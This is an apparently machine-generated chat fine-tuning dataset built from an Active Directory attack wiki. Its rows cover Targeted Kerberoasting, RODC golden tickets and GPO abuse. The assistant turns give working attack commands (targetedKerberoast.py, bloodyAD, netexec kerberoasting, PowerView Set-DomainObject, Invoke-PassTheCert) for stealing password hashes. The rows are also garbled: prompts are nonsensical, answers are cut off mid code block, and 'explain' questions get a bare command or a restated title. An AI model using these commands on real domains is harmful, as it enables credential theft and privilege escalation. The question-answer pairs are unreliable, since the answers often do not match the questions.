attack](../credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.\n\n\n=== Windows\n\nFrom Windows systems, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (PowerShell) can be used for this purpose."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Add the previous value plus the admin account during a pentest?", "response": "Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](../kerberos/forged-tickets/rodc-golden-tickets.md) and conduct a [key list attack](../credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.\n\n\n=== Windows\n\nFrom Windows systems, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (PowerShell) can be used for this purpose.", "metadata": {"corpus_index": 467, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Targeted Kerberoasting in the context of penetration testing"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operator group usually has those permissions.\n\nThe attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with targetedKerberoast.py (Python)\n\n``bash\ntargetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"\n`\n\n---\nAlternative 1: Using bloodyAD and netexec\n\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Targeted Kerberoasting in the context of penetration testing", "response": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operator group usually has those permissions.\n\nThe attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with targetedKerberoast.py (Python)\n\n``bash\ntargetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"\n`\n\n---\nAlternative 1: Using bloodyAD and netexec\n\n``", "metadata": {"corpus_index": 468, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Targeted Kerberoasting during a pentest?"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operator group usually has those permissions.\n\nThe attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with targetedKerberoast.py (Python)\n\n``bash\ntargetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"\n`\n\n---\nAlternative 1: Using bloodyAD and netexec\n\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Targeted Kerberoasting during a pentest?", "response": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operator group usually has those permissions.\n\nThe attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with targetedKerberoast.py (Python)\n\n``bash\ntargetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"\n`\n\n---\nAlternative 1: Using bloodyAD and netexec\n\n``", "metadata": {"corpus_index": 468, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use targetedKerberoast.py for targeted kerberoasting?"}, {"role": "assistant", "content": "targetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use targetedKerberoast.py for targeted kerberoasting?", "response": "targetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"", "metadata": {"corpus_index": 469, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "targetedKerberoast.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Targeted Kerberoasting?"}, {"role": "assistant", "content": "targetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Targeted Kerberoasting?", "response": "targetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"", "metadata": {"corpus_index": 469, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `targetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"`?"}, {"role": "assistant", "content": "This command is used for targeted kerberoasting. Targeted Kerberoasting"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `targetedKerberoast.py -v -d \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\"`?", "response": "This command is used for targeted kerberoasting. Targeted Kerberoasting", "metadata": {"corpus_index": 469, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Add a SPN to attribute to the targeted account work?"}, {"role": "assistant", "content": "bloodyAD -d \"$DOMAIN\" --host \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\" set object \"$TARGET\" servicePrincipalName -v 'http/anything'\n\nnxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -H \"$NThash\" --kerberoasting kerberoastables.txt\n``\n\n=== Windows\n\nFrom Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Add a SPN to attribute to the targeted account work?", "response": "bloodyAD -d \"$DOMAIN\" --host \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\" set object \"$TARGET\" servicePrincipalName -v 'http/anything'\n\nnxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -H \"$NThash\" --kerberoasting kerberoastables.txt\n``\n\n=== Windows\n\nFrom Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).\n\n``bash", "metadata": {"corpus_index": 470, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Add a SPN to attribute to the targeted account?"}, {"role": "assistant", "content": "bloodyAD -d \"$DOMAIN\" --host \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\" set object \"$TARGET\" servicePrincipalName -v 'http/anything'\n\nnxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -H \"$NThash\" --kerberoasting kerberoastables.txt\n``\n\n=== Windows\n\nFrom Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Add a SPN to attribute to the targeted account?", "response": "bloodyAD -d \"$DOMAIN\" --host \"$DC_HOST\" -u \"$USER\" -p \"$PASSWORD\" set object \"$TARGET\" servicePrincipalName -v 'http/anything'\n\nnxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -H \"$NThash\" --kerberoasting kerberoastables.txt\n``\n\n=== Windows\n\nFrom Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).\n\n``bash", "metadata": {"corpus_index": 470, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Add a SPN to attribute to the targeted account"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows machines, this can be achieved with [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/) and [Get-DomainSPNTicket](https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainSPNTicket/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Add a SPN to attribute to the targeted account", "response": "=== Windows\n\nFrom Windows machines, this can be achieved with [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/) and [Get-DomainSPNTicket](https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainSPNTicket/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module).", "metadata": {"corpus_index": 471, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for add a spn to attribute to the targeted account. Add a SPN to attribute to the targeted account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for add a spn to attribute to the targeted account. Add a SPN to attribute to the targeted account", "metadata": {"corpus_index": 471, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Make sur that the target account has no SPN"}, {"role": "assistant", "content": "Get-DomainUser 'victimuser' | Select serviceprincipalname"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Make sur that the target account has no SPN", "response": "Get-DomainUser 'victimuser' | Select serviceprincipalname", "metadata": {"corpus_index": 472, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Make sur that the target account has no SPN during a pentest?"}, {"role": "assistant", "content": "Get-DomainUser 'victimuser' | Select serviceprincipalname"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Make sur that the target account has no SPN during a pentest?", "response": "Get-DomainUser 'victimuser' | Select serviceprincipalname", "metadata": {"corpus_index": 472, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Set the SPN?"}, {"role": "assistant", "content": "Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Set the SPN?", "response": "Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}", "metadata": {"corpus_index": 473, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Set the SPN?"}, {"role": "assistant", "content": "Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Set the SPN?", "response": "Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}", "metadata": {"corpus_index": 473, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Obtain a kerberoast hash in the context of penetration testing"}, {"role": "assistant", "content": "$User = Get-DomainUser 'victimuser'\n$User | Get-DomainSPNTicket | fl"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Obtain a kerberoast hash in the context of penetration testing", "response": "$User = Get-DomainUser 'victimuser'\n$User | Get-DomainSPNTicket | fl", "metadata": {"corpus_index": 474, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Obtain a kerberoast hash?"}, {"role": "assistant", "content": "$User = Get-DomainUser 'victimuser'\n$User | Get-DomainSPNTicket | fl"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Obtain a kerberoast hash?", "response": "$User = Get-DomainUser 'victimuser'\n$User | Get-DomainSPNTicket | fl", "metadata": {"corpus_index": 474, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Clear the SPNs of the target account in the context of penetration testing"}, {"role": "assistant", "content": "$User | Select serviceprincipalname\nSet-DomainObject -Identity victimuser -Clear serviceprincipalname\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Clear the SPNs of the target account in the context of penetration testing", "response": "$User | Select serviceprincipalname\nSet-DomainObject -Identity victimuser -Clear serviceprincipalname\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 475, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Clear the SPNs of the target account?"}, {"role": "assistant", "content": "$User | Select serviceprincipalname\nSet-DomainObject -Identity victimuser -Clear serviceprincipalname\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Clear the SPNs of the target account?", "response": "$User | Select serviceprincipalname\nSet-DomainObject -Identity victimuser -Clear serviceprincipalname\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 475, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 1) work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'AddValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=VICTIM VU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -Value 'nonexistent/BLAHBLAH'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 1) work?", "response": "Invoke-PassTheCert -Action 'AddValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=VICTIM VU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -Value 'nonexistent/BLAHBLAH'", "metadata": {"corpus_index": 476, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 1)?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'AddValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=VICTIM VU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -Value 'nonexistent/BLAHBLAH'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 1)?", "response": "Invoke-PassTheCert -Action 'AddValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=VICTIM VU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -Value 'nonexistent/BLAHBLAH'", "metadata": {"corpus_index": 476, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 2, same as method 1)?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Kerberoasting' -Target 'CN=VICTIM VU. USER,CN=Users,DC=X' -SPN 'nonexistent/BLAHBLAH'\n```\n\n:::\n\nOnce the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 2, same as method 1)?", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Kerberoasting' -Target 'CN=VICTIM VU. USER,CN=Users,DC=X' -SPN 'nonexistent/BLAHBLAH'\n```\n\n:::\n\nOnce the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough.", "metadata": {"corpus_index": 477, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 2, same as method 1)"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Kerberoasting' -Target 'CN=VICTIM VU. USER,CN=Users,DC=X' -SPN 'nonexistent/BLAHBLAH'\n```\n\n:::\n\nOnce the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Add the 'nonexistent/BLAHBLAH' value into the target's serviceprincipalname attribute (method 2, same as method 1)", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Kerberoasting' -Target 'CN=VICTIM VU. USER,CN=Users,DC=X' -SPN 'nonexistent/BLAHBLAH'\n```\n\n:::\n\nOnce the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough.", "metadata": {"corpus_index": 477, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/targeted-kerberoasting.md", "page_title": "Targeted Kerberoasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Group policies - Theory?"}, {"role": "assistant", "content": "\"Group Policy\" is a management feature of Active Directory. It allows admins to manage computers and users. Group Policy Objetcs (GPOs) make up Group Policies. GPOs are associated to AD objects (sites, domains, organizational units (OUs)).\n\n> Group Policies can include security options, registry keys, software installation, and scripts for startup and shutdown and domain members refresh group policy settings every 90 minutes by default (5 minutes for Domain Controllers). This means that Group Policy enforces configured settings on the targeted computer.\n>\n> adsecurity.org\n\nIn certain scenarios, an attacker can gain control over GPOs. Some ACEs can give that control (see this BlackHat talk, page 28):\n\n* WriteProperty to the GPC-File-Sys-Path property of a GPO (specific GUID specified)\n* GenericAll, GenericWrite, WriteProperty to any property (no GUID specified)\n* WriteDacl, WriteOwner"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Group policies - Theory?", "response": "\"Group Policy\" is a management feature of Active Directory. It allows admins to manage computers and users. Group Policy Objetcs (GPOs) make up Group Policies. GPOs are associated to AD objects (sites, domains, organizational units (OUs)).\n\n> Group Policies can include security options, registry keys, software installation, and scripts for startup and shutdown and domain members refresh group policy settings every 90 minutes by default (5 minutes for Domain Controllers). This means that Group Policy enforces configured settings on the targeted computer.\n>\n> adsecurity.org\n\nIn certain scenarios, an attacker can gain control over GPOs. Some ACEs can give that control (see this BlackHat talk, page 28):\n\n* WriteProperty to the GPC-File-Sys-Path property of a GPO (specific GUID specified)\n* GenericAll, GenericWrite, WriteProperty to any property (no GUID specified)\n* WriteDacl, WriteOwner", "metadata": {"corpus_index": 478, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Group policies - Theory?"}, {"role": "assistant", "content": "\"Group Policy\" is a management feature of Active Directory. It allows admins to manage computers and users. Group Policy Objetcs (GPOs) make up Group Policies. GPOs are associated to AD objects (sites, domains, organizational units (OUs)).\n\n> Group Policies can include security options, registry keys, software installation, and scripts for startup and shutdown and domain members refresh group policy settings every 90 minutes by default (5 minutes for Domain Controllers). This means that Group Policy enforces configured settings on the targeted computer.\n>\n> adsecurity.org\n\nIn certain scenarios, an attacker can gain control over GPOs. Some ACEs can give that control (see this BlackHat talk, page 28):\n\n* WriteProperty to the GPC-File-Sys-Path property of a GPO (specific GUID specified)\n* GenericAll, GenericWrite, WriteProperty to any property (no GUID specified)\n* WriteDacl, WriteOwner"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Group policies - Theory?", "response": "\"Group Policy\" is a management feature of Active Directory. It allows admins to manage computers and users. Group Policy Objetcs (GPOs) make up Group Policies. GPOs are associated to AD objects (sites, domains, organizational units (OUs)).\n\n> Group Policies can include security options, registry keys, software installation, and scripts for startup and shutdown and domain members refresh group policy settings every 90 minutes by default (5 minutes for Domain Controllers). This means that Group Policy enforces configured settings on the targeted computer.\n>\n> adsecurity.org\n\nIn certain scenarios, an attacker can gain control over GPOs. Some ACEs can give that control (see this BlackHat talk, page 28):\n\n* WriteProperty to the GPC-File-Sys-Path property of a GPO (specific GUID specified)\n* GenericAll, GenericWrite, WriteProperty to any 